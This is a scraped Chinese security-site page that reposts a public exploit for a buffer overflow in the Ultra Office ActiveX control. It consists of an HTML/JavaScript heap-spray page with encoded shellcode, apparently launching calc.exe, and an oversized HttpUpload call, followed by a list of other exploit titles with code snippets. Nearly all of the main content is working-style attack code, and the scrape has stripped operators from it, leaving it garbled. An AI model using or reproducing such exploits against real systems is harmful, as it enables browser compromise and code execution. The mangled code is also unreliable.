Ultra Office ActiveX Control Remote Buffer Overflow Exploit

所属分类: 网络安全 / Exploit 阅读数: 136
收藏 0 赞 0 分享
-----------------------------------------------------------------------------
Ultra Office ActiveX Control Remote Buffer Overflow
url: http://www.ultrashareware.com Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage. Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------
<script language="JavaScript" defer>
var sCode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800"
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A"
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350"
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40"
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000"
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040"
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD"
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40"
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18"
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0"
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B"
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24"
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9"
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C"
"%u652E%u6578%u9000");
var sSlide = unescape("%u9090%u9090");
var heapSA = 0x0c0c0c0c;
function tryMe()
{
var buffSize = 20000;
var x = unescape(" ");
while (x.length<buffSize) x = x;
x = x.substring(0,buffSize);
boom.HttpUpload(x, x, x);
}
function getsSlide(sSlide, sSlideSize)
{
while (sSlide.length*2<sSlideSize)
{
sSlide = sSlide;
}
sSlide = sSlide.substring(0,sSlideSize/2);
return (sSlide);
}
var heapBS = 0x400000;
var sizeHDM = 0x5;
var PLSize = (sCode.length * 2);
var sSlideSize = heapBS - (PLSize sizeHDM);
var heapBlocks = (heapSA heapBS)/heapBS;
var memory = new Array();
sSlide = getsSlide(sSlide,sSlideSize);
for (i=0;i<heapBlocks;i )
{
memory[i] = sSlide sCode;
}
</script>
<body onload="JavaScript: return tryMe();">
<object id="boom" classid="clsid:00989888-BB72-4E31-A7C6-5F819C24D2F7">
Unable to create object
</object>
更多精彩内容其他人还在看

LoveCMS 1.6.2 Final Remote Code Execution Exploit

#!/usr/bin/ruby # ## Exploit by PoMdaPiMp! ## --------------------- ## pomdapimp(at)gmail(dotcom) ## ## LoveCMS Exploi
收藏 0 赞 0 分享

Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

#!/usr/bin/perl # carved-out by: crit3rion, just making th3 world a b3tt3r plac3! # Xerox_Remote_DoS.20080801.ver01 (tanx to dr0pz0N3
收藏 0 赞 0 分享

moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit

#!/usr/bin/perl # # moziloCMS 1.10.1 Perl exploit # # discovered & written by Ams # ax330d [doggy] gmail [dot] com # # DESCRIP
收藏 0 赞 0 分享

Joomla Component EZ Store Remote Blind SQL Injection Exploit

#!/usr/bin/perl #Note:Sometimes you have to change the regexp to viewcategory/catid,".$cid." use LWP::UserAgent; use Get
收藏 0 赞 0 分享

Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit

<!-- In addition to the overflow found in the "Friendly Technologies" dialers ActiveX, Here is a "remote command execu
收藏 0 赞 0 分享

Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit

<!-- "Friendly Technologies" provide software like L2TP and PPPoE clients to ISPs, who give the software to their customers
收藏 0 赞 0 分享

IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit

/* * IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Expoit * * Discovered & Written by r0ut3r (writ3r [at] gmail.com) *
收藏 0 赞 0 分享

Ultra Office ActiveX Control Remote Buffer Overflow Exploit

----------------------------------------------------------------------------- Ultra Office ActiveX Control Remote Buffer Overflow url:
收藏 0 赞 0 分享

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote Buffer Overflow Exploit Author: Koshi Original POC: http://www.milw0rm.com/exploi
收藏 0 赞 0 分享

MyBulletinBoard (MyBB)

<?php // forum mybb <= 1.2.11 remote sql injection vulnerability // bug found by Janek Vind "waraxe" http://www.waraxe
收藏 0 赞 0 分享
查看更多